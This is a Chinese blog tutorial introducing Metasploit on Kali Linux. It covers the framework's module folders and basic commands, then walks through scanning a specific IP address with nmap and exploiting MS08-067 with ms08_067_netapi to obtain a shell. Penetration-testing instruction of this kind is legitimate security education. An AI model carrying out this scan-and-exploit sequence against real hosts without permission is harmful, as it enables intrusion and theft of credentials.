您的位置:首页 > 编程语言 > ASP

kali 漏洞利用metasploit

2017-08-15 18:36 295 查看

Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。

1.启动服务:

在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录



2.路径介绍

kali中,msf的路径为/usr/share/metasploit-framework



比如modules中,是我们在msf中经常会利用到的一些工具



auxiliary:辅助模块

encoders:供msfencode编码工具使用,具体可使用msfencode -l

exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录。

payloads:这里面列出的是攻击载荷,也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

post:后渗透阶段模块,在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump,arp_scanner就在这里。

3.基本命令

msfpayload:用来生成payload或者shellcode

搜索的时候可以用msfpayload -l |grep “windows”这样的命令查询。

-o 选项可以列出payload所需的参数

msfencode:

msf中的编码器,现在常用msfpayload与它编码避免exploit的坏字符串(比如00,会起到隔断作用)

msfconsole:

开启metasploit的console

4.测试示例:发现漏洞,搜索exploit,先用nmap扫描主机,扫描命令

nmap -sS -sV -O --script=smb-check-vulns.nse -n 222.28.136.22
1


1



可以看到,其中含有漏洞MS08-067

在console中搜索一下,可以看到下面的界面



然后就use其中一个版本

use exploit/windows/smb/ms08_067_netapi
1


1
查看一些参数



可以看到RHOST(远程IP地址)还没有设置,这时我们就使用下面的命令来设置

set RHOST 222.28.136.22 
1


1
选择payload



设置好之后,就可以对目标进行攻击测试,输入exploit即可,如果成功,就会返回一个shell
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: